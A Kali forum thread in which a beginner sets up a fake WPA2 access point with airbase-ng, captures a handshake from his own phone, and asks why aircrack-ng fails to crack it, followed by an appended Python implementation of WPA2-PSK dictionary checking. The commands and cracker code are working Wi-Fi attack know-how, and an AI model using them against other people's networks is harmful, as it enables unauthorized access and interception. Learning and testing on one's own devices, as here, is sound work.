How can I accept a handshake with airbase-ng



elidd1
2015-07-30, 22:45
Hi all,
Let me start by saying, yes, I am a noob to Kali and all its wonderful and mystical tools, and perhaps I have watched too many episodes of Mr. Robot. That said, I have been playing with airbase-ng, airmon-ng, and airodump-ng and having a wonderful time.

Recently I conducted an experiment where I created a fake ESSID called "freeboobs" like so:

airbase-ng -a AA:AA:AA:AA:AA:AA -e "freeboobs" -c 6 -W 1 -Z 4 wlan1mon


In a second terminal window I started a dump like so:

airodump-ng -c 6 --output-format pcap -w /root/fakeboobs wlan1mon


I then went over to my phone and looked for the "freeboobs" network... there it was! And who doesn't want to connect with 'freeboobs'... so I connected using the password "iloveyou", as I knew it existed in my wordlist 'rockyou.txt'.

Soon enough I got the two terminal windows to output the following:


root@kali:~# airbase-ng -a AA:AA:AA:AA:AA:AA -e "freeboobs" -c 6 -W 1 -Z 4 -V 3 wlan1mon
18:14:11 Created tap interface at0
18:14:11 Trying to set MTU on at0 to 1500
18:14:11 Access Point with BSSID AA:AA:AA:AA:AA:AA started.
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"


and...


CH 6 ][ Elapsed: 1 min ][ 2015-07-30 18:15 ][ WPA handshake: AA:AA:AA:AA:AA:AA

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 AA:AA:AA:AA:AA:AA    0  15      976      509    0   6  54   WPA2 CCMP   PSK  freeboobs


My question is in two parts:

1. The phone failed to connect... it said "authenticating" and then never got authenticated. I guess this is expected, but is it possible to fake the final part of the handshake and allow the phone to be connected, so I can explore possible MitM attacks?

2. After I stopped airodump, I ran cowpatty and got a success:


root@kali:~# cowpatty -r '/root/fakeboobs-02.cap' -c
cowpatty 4.6 - WPA-PSK dictionary attack. <[email protected]>

Collected all necessary data to mount crack against WPA2/PSK passphrase.

But I have been running aircrack:

aircrack-ng -w /root/rockyou.txt fakeboobs-02.cap

Knowing that the password I entered, 'iloveyou', is early in the list, and it has been going for about 2 hours now... is it possible that it won't crack the password even though it's in the list? If so, why?

UPDATE: it did not crack the password after three hours, so I ran the script again, ensuring that I used "iloveyou" as the password and using a txt file that only has 'iloveyou'. It did NOT crack the password.

Any ideas why?

Thanks for helping me learn.

elidd1

scorpius
2015-08-05, 17:59
1. Your phone will never really authenticate when using airbase-ng; you will have to use something like hostapd.
2. Aircrack-ng does not always find the password because the handshake may be malformed, or not complete, or out of sequence. The best tool is pyrit with the --all-handshakes option. It always finds the password unless your handshake is really corrupt.
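To make the "malformed, not complete, or out of sequence" point above concrete, here is an added worked example (not code from either poster, and not aircrack-ng's or cowpatty's actual internals). It implements WPA2-PSK verification from the standard library only: PMK via PBKDF2, PTK via the 802.11i PRF, and the HMAC-SHA1-128 MIC over EAPOL-Key message 2. The "capture" is constructed in code, not taken from the post's pcap: a phone that really knows "iloveyou" for SSID "freeboobs" answers a fake AP's message 1, but the fake AP, which can never finish the handshake, has already started another attempt with a fresh ANonce, so the capture holds two M1 frames and one M2. A cracker that pairs the M2 with the nearest preceding M1 derives the PTK from the wrong ANonce and fails for every candidate, including the right one, even though a presence check ("we have an M1 and an M2") passes. Pairing by replay counter recovers the passphrase. The MAC addresses are those shown in the post's output; the nonces, replay counters and the one-M2/two-M1 ordering are assumptions.

```python
"""Why a captured WPA2 handshake can be 'complete' yet never crack: M1/M2 mis-pairing."""
import hashlib
import hmac
import struct

# EAPOL-Key Key Information bits (IEEE 802.11) and MIC location in the frame
KEY_INFO_ACK = 0x0080      # set on M1 and M3 (sent by the AP)
KEY_INFO_MIC = 0x0100      # set on M2, M3, M4
KEY_INFO_SECURE = 0x0200   # set on M3 and M4, clear on M2
MIC_OFFSET = 81            # 4-byte 802.1X header + 77 bytes of key descriptor before the MIC
MIC_LEN = 16

# Values from the post's airbase-ng / airodump-ng output; SSID and passphrase as the poster used them
SSID = "freeboobs"
AP_MAC = bytes.fromhex("aaaaaaaaaaaa")
STA_MAC = bytes.fromhex("847a885d0ddb")
REAL_PSK = "iloveyou"


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-384: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # 3 * 20 bytes >= 48-byte CCMP PTK; KCK is the first 16 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def build_eapol_key(key_info: int, replay_counter: int, nonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Minimal EAPOL-Key frame (descriptor type 2 = RSN); key data left empty for brevity."""
    key_length = 16 if key_info & KEY_INFO_ACK else 0          # AP states the CCMP key length in M1
    body = struct.pack(">BHHQ", 2, key_info, key_length, replay_counter)
    body += nonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, key IV, RSC, key ID
    body += mic + struct.pack(">H", 0)                          # MIC, key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body          # 802.1X v2, type 3 = EAPOL-Key


def parse_eapol_key(frame: bytes) -> dict:
    _, key_info, _, replay_counter = struct.unpack(">BHHQ", frame[4:17])
    return {
        "replay_counter": replay_counter,
        "nonce": frame[17:49],
        "mic": frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN],
        "is_m1": bool(key_info & KEY_INFO_ACK) and not key_info & KEY_INFO_MIC,
        "is_m2": bool(key_info & KEY_INFO_MIC) and not key_info & (KEY_INFO_ACK | KEY_INFO_SECURE),
    }


def compute_mic(kck: bytes, frame: bytes) -> bytes:
    """Descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits over the frame with MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def check_passphrase(candidate: str, m1: bytes, m2: bytes) -> bool:
    """True iff the candidate reproduces M2's MIC using the ANonce carried in this particular M1."""
    anonce, snonce = parse_eapol_key(m1)["nonce"], parse_eapol_key(m2)["nonce"]
    kck = derive_ptk(pmk_from_passphrase(candidate, SSID), AP_MAC, STA_MAC, anonce, snonce)[:16]
    return hmac.compare_digest(compute_mic(kck, m2), parse_eapol_key(m2)["mic"])


def pair_handshakes(frames: list, by_replay_counter: bool) -> list:
    """Pair each M2 with an M1: either the most recent M1 seen, or the M1 with the same replay counter."""
    pairs, last_m1, m1_by_rc = [], None, {}
    for f in frames:
        p = parse_eapol_key(f)
        if p["is_m1"]:
            last_m1 = f
            m1_by_rc[p["replay_counter"]] = f
        elif p["is_m2"]:
            m1 = m1_by_rc.get(p["replay_counter"]) if by_replay_counter else last_m1
            if m1 is not None:
                pairs.append((m1, f))
    return pairs


def has_m1_and_m2(frames: list) -> bool:
    """The kind of presence check that reports 'collected all necessary data' without verifying anything."""
    parsed = [parse_eapol_key(f) for f in frames]
    return any(p["is_m1"] for p in parsed) and any(p["is_m2"] for p in parsed)


def build_sample_capture() -> list:
    """Constructed capture (assumption, not the post's pcap): two M1s from the fake AP, one honest M2."""
    anonce1 = hashlib.sha256(b"anonce attempt 1").digest()   # placeholder nonces, chosen here
    anonce2 = hashlib.sha256(b"anonce attempt 2").digest()
    snonce = hashlib.sha256(b"snonce from phone").digest()
    m1_a = build_eapol_key(0x008A, 1, anonce1)               # pairwise | ack | version 2
    m1_b = build_eapol_key(0x008A, 2, anonce2)               # fresh attempt, fresh ANonce
    unsigned_m2 = build_eapol_key(0x010A, 1, snonce)         # pairwise | mic | version 2
    kck = derive_ptk(pmk_from_passphrase(REAL_PSK, SSID), AP_MAC, STA_MAC, anonce1, snonce)[:16]
    m2_a = build_eapol_key(0x010A, 1, snonce, mic=compute_mic(kck, unsigned_m2))
    return [m1_a, m1_b, m2_a]                                # M2 arrives after the retried M1


def crack(frames: list, wordlist: list, by_replay_counter: bool):
    """Return the first wordlist entry that validates any paired handshake, else None."""
    for m1, m2 in pair_handshakes(frames, by_replay_counter):
        for word in wordlist:
            if check_passphrase(word, m1, m2):
                return word
    return None


if __name__ == "__main__":
    cap = build_sample_capture()
    words = ["123456", "iloveyou", "password"]
    print("M1 and M2 present:", has_m1_and_m2(cap))
    print("nearest-M1 pairing:", crack(cap, words, by_replay_counter=False))
    print("replay-counter pairing:", crack(cap, words, by_replay_counter=True))
```

The lesson for the poster's scenario: a fake AP that does not know the PSK can only ever elicit M1/M2 pairs, the client keeps retrying (hence the eleven "associated" lines), and the pcap fills with nonces from different attempts. Before blaming the wordlist, extract the EAPOL frames and confirm that the M2 being attacked really belongs to the M1 whose ANonce is used.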